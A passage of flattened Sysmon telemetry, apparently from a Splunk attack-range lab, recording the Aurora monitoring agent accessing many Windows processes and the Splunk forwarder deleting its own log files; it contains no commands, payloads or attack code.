Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBA22FF5484682C06BEFC1A5A6EBC33D,SHA256=40F9275BB400659406BFBD17513AFB48E8C4443147C6DB8DAE942DBF51C081EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.774{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.753{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.746{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.688{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.686{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.684{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.682{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.679{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.679{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.675{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.674{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.674{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.673{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.671{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.156{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.155{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000047794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.123{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57034DF08E1D348F74AEB88DD6E534C3,SHA256=1C7F55EF9BE6F9F06F5A1F469C60166586B068DBAD209DDF213181D8FFF605E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018891Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:35.598{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=826C78399B8DEAAEC733BA5CA96A90FC,SHA256=5508ED3B439F064A7485B71052E2742625320F17F30C0D31DE375A7051AB481E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.846{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58B2A33682D06710F31397835573D408,SHA256=E345C968F37B33F7FC5B4A6DE1C583D64D731ECC98C5FC2C81B1D674286E57DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla 